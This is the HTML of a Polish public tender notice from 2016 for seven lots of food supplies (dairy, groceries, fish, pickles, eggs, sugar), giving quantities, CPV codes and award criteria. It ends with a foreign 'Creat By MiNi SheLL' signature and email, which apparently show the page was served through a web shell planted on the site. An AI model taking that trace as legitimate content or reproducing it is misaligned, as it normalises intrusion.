              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza zmianę postanowień warunków umowy dotyczących terminu realizacji przedmiotu zamówienia jedynie w przypadkach niezależnych od wykonawcy, na skutek klęsk żywiołowych spowodowanych nieodwracalnymi działaniami przyrody lub na skutek działań osób trzecich. Udowodnienie ww. sytuacji leżeć będzie po stronie wykonawcy.
Brzmienie istotnych postanowień projektu umowy może ulec zmianie w dowolnym zakresie jedynie przed terminem składania ofert.
W uzasadnionych przypadkach dotyczących: wstrzymania, zaprzestania produkcji, wycofania z rynku lub zmiany marki, Zamawiający przewiduje możliwość zmiany umowy w zakresie oferowanego asortymentu z zastrzeżeniem, iż oferowany zamiennik musi odpowiadać parametrom, co najmniej takim (niegorszym) jak oferowany produkt z gwarancją zachowania oferowanej ceny.
Zamawiający dopuszcza możliwość dokonania zmian zawartej umowy jedynie w przypadku, gdy wynikać to będzie z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy (m. in. zmiany wysokości podatku od towarów i usług)<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 14/12/2016, godzina: 09:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              <br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Artykuły nabiałowe, tłszcze jadalne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>1. Mleko w proszku granulowane odtłuszczone (opakowanie 5  25 kg), 850 kg.
2. Serek topiony *(opakowanie jednostkowe 0,1 kg), 1550 kg.
3. Serek homogenizowany naturalny (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,1  0,15 kg,) termin przydatności do spożycia min. 10 dni od daty dostawy, 1750 kg.
4. Serek kanapkowy naturalny do smarowania (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,1 - 0,150 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 450 kg.
5. Ser twarogowy chudy (opakowanie 0,2  0,25 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 2750 kg.
6. Serek typu fromage (opakowanie jednostkowe o gramaturze 0,08 -0,1 kg z folii wielowarstwowej lub kształtki z tworzywa sztucznego zamykane zakrywką z folii aluminiowej termozgrzewalnej) termin przydatności do spożycia min. 10 dni od daty dostawy, 950 kg.
7. Ser żółty twardy, pełnotłusty, podpuszczkowy dojrzewający wyrabiany z mleka pasteryzowanego o ustalonej zawartości tłuszczu nie mniej niż 45%, bez dodatku tłuszczu roślinnego*, (opakowanie, kostka lub blok od 1,5 do 5 kg), 900 kg.
8. Serek ziarnisty (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,15 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 400 kg.                      
9. Jogurt owocowy (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,12  0,2 kg) termin przydatności do spożycia min. 10 dni od daty dostawy, 250 kg. 
10. Jogurt naturalny (opakowanie z tworzywa sztucznego zamykane zatyczką z folii aluminiowej termozgrzewalnej o gramaturze 0,12  0,2 kg )termin przydatności do spożycia min. 10 dni od daty dostawy, 220 kg. 
11. Śmietana 12% (opakowanie 0,2  1 litr) termin przydatności do spożycia min. 10 dni od daty dostawy, 280 l.
12. Margaryna roślinna do smarowania pieczywa (kostka 0,25 kg), zawartość tłuszczu minimum 40%, 7000 kg.
13. Olej roślinny jadalny (opakowanie jednostkowe od 1 -  5 litrów), 700 l.
* - nie dopuszcza się produktów sero podobnych<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15500000-8, 15400000-2,
                    <br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Różne artykuły spożywcze<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 2  Różne artykuły spożywcze:

1. Dżem owocowy, opak. jednostkowe 25g, 180kg.
2. Miód pszczeli naturalny  opak. jednostkowe 25g, 100kg.
3. Dżem owocowy, opakowanie  wiaderka do 15kg, 1250kg.
4. Powidła śliwkowe, opakowanie - wiaderka do 15kg, 1250kg.
5. Marmolada wieloowocowa twarda, opakowanie  wiaderka do 15kg, 1250kg
6. Groszek konserwowy kl. I, opak. puszka od 0,4 do 5 kg, 420kg.
7. Papryka konserwowa w zalewie   opak. puszki lub słoje, waga netto po odcieku min. 45%wagi, 400kg.
8. Koncentrat pomidorowy 30% , opak. puszka do 5 kg, 1000kg.
9. Mieszanka warzyw suszonych  minimum 5 składnikowa (m.in. seler, pietruszka, marchew, cebula, por), opak. do 10 kg, 400kg.
10. Fasola biała Jaś, opak. do 50 kg, 1500kg.
11. Groch obłuskany, opak. do 50 kg, 1500kg.
12. Krajanka sojowa, opak. do 20 kg, 280kg.
13. Kotlety sojowe (schabowe), opak do 20 kg, 280kg.
14. Granulat sojowy, opak. do 20 kg, 80kg.
15. Herbata granulowana, opakowania do 10 kg, 170kg.
16. Kawa zbożowa, opakowania do 10 kg, 200kg.
17. Musztarda, opak. jednostkowe 1 kg, 200kg.
18. Majonez, 30kg.
19. Pieprz czarny mielony opakowanie do 1 kg, 75kg.
20. Majeranek w opakowaniach do 1 kg, 20kg.
21. Liść laurowy w opakowaniach do 1 kg, 15kg.
22. Ziele angielskie ziarno w opakowaniach do 1 kg, 15kg.
23. Papryka słodka mielona w opakowaniach do 1 kg, 40kg.
24. Czosnek mielony w opakowaniach do 1 kg, 45kg.
25. Koperek suszony w opakowaniach do 1 kg, 16kg.
26. Przyprawa uniwersalna w proszku typu jarzynka lub równoważna, 87kg.
27. Sól jodowana paczkowana po 1 kg, 1400kg.
28. Przyprawa w płynie typu magi w opakowaniach do 2l., 960l.
29. Ocet spirytusowy 10%,opak. jednostkowe 1l, 180l.
30. Przyprawa do mięs w proszku, 40kg.
31. Przyprawa do bigosu w proszku, 15kg.
32. Kminek przyprawa, 4kg.
33. Syrop wysoko słodzony, 450l.
34. Kwasek cytrynowy, 3kg.
35. Bulion drobiowy, opak. do 20 kg, 550kg.
36. Sos grzybowy w proszku, opak. do 20 kg, 50kg.
37. Sos pieczeniowy w proszku, opak. do 20 kg, 60kg.
38. Sos boloński w proszku, opak. do 20 kg, 70kg.
39. Sos myśliwski w proszku  opak. do 20 kg, 40kg.
40. Zupa w proszku  barszcz biały, opak. do 20 kg, 200kg.
41. Żurek śląski  zakwas w płynie  do 1l, 720l.
42. Paprykarz warzywny opakowanie 120g (alupac), 144kg.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15800000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Konserwy rybne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 3  Konserwy rybne:
1. Konserwa  sałatka rybna typu Neptun lub równoważna puszka z samootwieraczem 
 waga jednostkowa do 330g, 462kg.
2. Konserwa  paprykarz szczeciński puszka z samootwieraczem  waga jednostkowa do 330g, 561kg.
3. Konserwa  szprot w sosie pomidorowym puszka z samootwieraczem -  waga jednostkowa do 330g, 412,50kg<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15200000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Ryby mrożone, przetwory rybne<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 4  Ryby mrożone, przetwory rybne:
1. Filety śledziowe matias w wiaderkach do 12 kg, 400kg.
2. Ryba mrożona  filet z mintaja mrożony  w technologii shatterpack (SHP): ryby układane warstwami, przekładane folią, mrożone w blokach, zawartość glazury: 3-5% , w opakowaniach kartonowych do 25kg, 260kg. 
3. Kotlet rybny mrożony  produkt garmażeryjny, panierowany, skład ryby min. 40%, 600kg.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15220000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Warzywa przetworzone - kiszonki<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 5  Warzywa przetworzone kiszonki:
1. Kapusta kiszona opak. beczki zamykane  pojemność do 80 kg, 7500kg.
2. Ogórki kiszone opak. beczki zamykane  pojemność do 80 kg, 4500kg.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15330000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data rozpoczęcia: 01/01/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>6
                  
                <b>Nazwa: </b>Jaja spożywcze<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 6  Jaja spożywcze:
1. Jaja konsumpcyjne  klasa świeżości  A, kategoria wagowa L, 55000szt.<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15330000-0<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymany termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>7
                  
                <b>Nazwa: </b>Cukie biały<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Część 7  Cukier biały:
1. Cukier biały  opakowanie jednostkowe 1 kg, 5500kg<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>15831200-4<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 31/12/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Maksymalny termin płatności</td><td>40</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com